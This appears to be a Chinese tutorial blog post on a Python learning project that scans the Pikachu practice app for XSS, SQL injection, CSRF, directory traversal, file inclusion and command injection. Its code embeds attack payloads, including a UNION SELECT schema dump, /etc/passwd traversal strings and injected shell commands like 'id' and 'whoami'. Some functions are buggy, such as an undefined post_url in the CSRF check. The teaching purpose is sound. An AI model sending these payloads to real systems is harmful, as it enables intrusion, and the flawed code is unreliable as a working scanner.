自动化漏洞扫描：一款基于Pikachu框架的Web漏洞检测工具详解

引言

在当今的网络安全环境中，保护Web应用程序免受各种攻击显得尤为重要。无论是SQL注入、跨站脚本攻击（XSS）还是目录遍历，漏洞都可能成为黑客的攻击入口。而如何快速检测这些漏洞呢？今天，我将带你深入了解一款基于Python的自动化Web漏洞检测工具，通过代码实现轻松发现Web应用程序中的潜在威胁。

项目概述

这款工具使用了Python中常用的Web处理库，如requests、BeautifulSoup 和 Selenium，实现了对XSS、SQL注入、CSRF、目录遍历、文件包含和命令注入等多种漏洞的检测。通过一段简单的代码，它能自动扫描指定的Web应用，并给出详细的漏洞报告。

核心功能一览

1. XSS漏洞检测：跨站脚本攻击一网打尽

跨站脚本攻击（XSS）是一种常见的Web漏洞，通过向目标页面注入恶意脚本，攻击者可以窃取用户信息或控制页面行为。在这款工具中，多个函数负责检测不同类型的XSS漏洞：

def xsspayload1(url):
    payload = {'message': '<script>alert("XSS")</script>', 'submit':'submit'}
    response = requests.post(url, params=payload, headers=headers)
    bro.get(response.url)
    try:
        alert = bro.switch_to.alert
        alert.accept()
        return True
    except NoAlertPresentException:
        return False

这个函数将带有恶意脚本的表单数据发送到指定的URL，并使用Selenium检查页面是否弹出Alert框，从而判断是否存在XSS漏洞。类似的，我们还定义了多个检测不同XSS场景的函数，确保覆盖广泛的攻击方式。

2. SQL注入漏洞检测：阻止数据库被攻陷

SQL注入是最危险的Web漏洞之一，攻击者可以通过恶意构造的SQL语句获取、篡改甚至删除数据库中的数据。我们的工具对常见的SQL注入类型进行检测：

def num_sql(url):
    payload = {'id': 'id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#&submit=%E6%9F%A5%E8%AF%A2'}
    response = requests.post(url, data=payload, headers=headers)
    user_soup = BeautifulSoup(response.text, 'html.parser')
    user_tag = user_soup.find_all('p')
    for tag in user_tag:
        if 'xssblind' in tag.text:
            return True
    return False

这个函数构造了一个联合查询（UNION SELECT）攻击语句，向目标URL发送请求，并检查响应中是否包含数据库表名等敏感信息，来判断SQL注入漏洞的存在。

3. CSRF漏洞检测：防止跨站请求伪造

CSRF（跨站请求伪造）攻击可以诱使用户在已认证的Web应用中执行恶意操作。该工具通过检查表单中的CSRF令牌来检测漏洞：

def csrf(url):
    response = requests.get(url, headers=headers)
    soup = BeautifulSoup(response.text, 'html.parser')
    csrf_token = soup.find('input', {'name': 'csrf_token'})
    if not csrf_token:
        return True, f"CSRF漏洞检测：存在漏洞（缺少CSRF令牌） - {url}"
    # 构造表单数据并提交
    form_data = {'csrf_token': csrf_token.get('value', ''), 'some_field': 'some_value'}
    post_response = requests.post(post_url, data=form_data, headers=headers)
    if post_response.status_code == 200:
        return False, f"CSRF漏洞检测：无漏洞 - {url}"
    return True, f"CSRF漏洞检测：存在漏洞 - {url}"

通过分析页面中的CSRF令牌，工具能够识别是否存在防护机制，确保Web应用免受CSRF攻击。

4. 目录遍历与文件包含检测：守护服务器安全

目录遍历和文件包含漏洞可能导致攻击者访问服务器上的敏感文件。我们为此设计了以下检测逻辑：

def directory_traversal(url):
    payloads = ["../../../../etc/passwd", "..\\..\\..\\..\\Windows\\system.ini"]
    for payload in payloads:
        test_url = f"{url}?file={payload}"
        response = requests.get(test_url, headers=headers)
        if "root:x" in response.text or "windows" in response.text:
            return True, f"目录遍历漏洞检测：存在漏洞，使用的负载为：{payload} - {url}"
    return False, "目录遍历漏洞检测：无漏洞"

def file_inclusion(url):
    payloads = ["../../../../etc/passwd", "..\\..\\..\\..\\..\\Windows\\system.ini"]
    for payload in payloads:
        test_url = f"{url}?file={payload}"
        response = requests.get(test_url, headers=headers)
        if "root:x" in response.text or "[boot loader]" in response.text:
            return True, f"文件包含漏洞检测：存在漏洞，使用的负载为：{payload} - {url}"
    return False, "文件包含漏洞检测：无漏洞"

通过发送特定路径的请求，工具可以检测是否能够访问到不应暴露的系统文件，从而判断是否存在漏洞。

5. 命令注入检测：防止服务器被劫持

命令注入漏洞允许攻击者在服务器上执行任意命令，从而完全控制系统。工具通过发送各种测试命令来检查漏洞：

def command_injection(url):
    payloads = ["test; id", "test && whoami"]
    for payload in payloads:
        test_url = f"{url}?cmd={payload}"
        response = requests.get(test_url, headers=headers)
        if "uid=" in response.text or "root:x" in response.text:
            return True, f"命令注入漏洞检测：存在漏洞，使用的负载为：{payload} - {url}"
    return False, "命令注入漏洞检测：无漏洞"

工具发送恶意命令到服务器，并检查响应中是否包含相关输出，以确认是否存在命令注入漏洞。

结果汇总与分析

在完成所有检测后，工具会汇总并输出检测结果：

def fetch_and_parse(url):
    total_vulnerabilities = 0
    xss_detected, sql_detected, csrf_detected = 0, 0, 0
    dir_detected, file_inclusion_detected, command_injection_detected = 0, 0, 0

    response = requests.get(url, headers=headers)
    soup = BeautifulSoup(response.text, 'html.parser')
    vulnerability_links = soup.find_all('a', href=lambda href: href and 'vul/' in href)

    for link in vulnerability_links:
        total_vulnerabilities += 1
        full_url = f"{url.rstrip('/')}/{link['href']}"
        print(f"Testing link {total_vulnerabilities}: {full_url}")

        if "xss" in link['href']:
            detected, result = xss(full_url)
            if detected:
                xss_detected += 1
            print(result)
        elif "sqli" in link['href']:
            detected, result = sql_inject(full_url)
            if detected:
                sql_detected += 1
            print(result)
        elif "csrf" in link['href']:
            detected, result = csrf(full_url)
            if detected:
                csrf_detected += 1
            print(result)
        elif "dir" in link['href']:
            detected, result = directory_traversal(full_url)
            if detected:
                dir_detected += 1
            print(result)
        elif "fileinclude" in link['href']:
            detected, result = file_inclusion(full_url)
            if detected:
                file_inclusion_detected += 1
            print(result)
        elif "cmd" in link['href']:
            detected, result = command_injection(full_url)
            if detected:
                command_injection_detected += 1
            print(result)

    print(f"总共检测了 {total_vulnerabilities} 个漏洞链接。")
    print(f"XSS漏洞总数: {xss_detected}")
    print(f"SQL注入漏洞总数: {sql_detected}")
    print(f"CSRF漏洞总数: {csrf_detected}")
    print(f"目录遍历漏洞总数: {dir_detected}")
    print(f"文件包含漏洞总数: {file_inclusion_detected}")
    print(f"命令注入漏洞总数: {command_injection_detected}")

工具遍历页面中的所有潜在漏洞链接，对每个链接进行详细测试，并最终输出每种漏洞的检测结果，为开发人员提供明确的安全评估。

结语

通过这个项目，我们不仅深入学习了如何利用Python和相关库来检测Web应用中的常见漏洞，还体验了自动化测试在安全领域的强大力量。这款工具虽然是一个学习项目，但它涵盖了XSS、SQL注入、CSRF等多种常见攻击方式的检测，让我们对这些安全问题有了更直观的理解。

当然，这只是学习和探索的起点。未来，你可以继续优化这个工具，或者尝试添加更多的漏洞检测类型，以进一步提升你的技能。记住，网络安全是一门不断发展的学科，掌握这些技能不仅能提升你的技术水平，还能为你在这个领域的进一步探索打下坚实的基础。

继续学习，继续进步，你会发现网络安全的世界比你想象的还要精彩！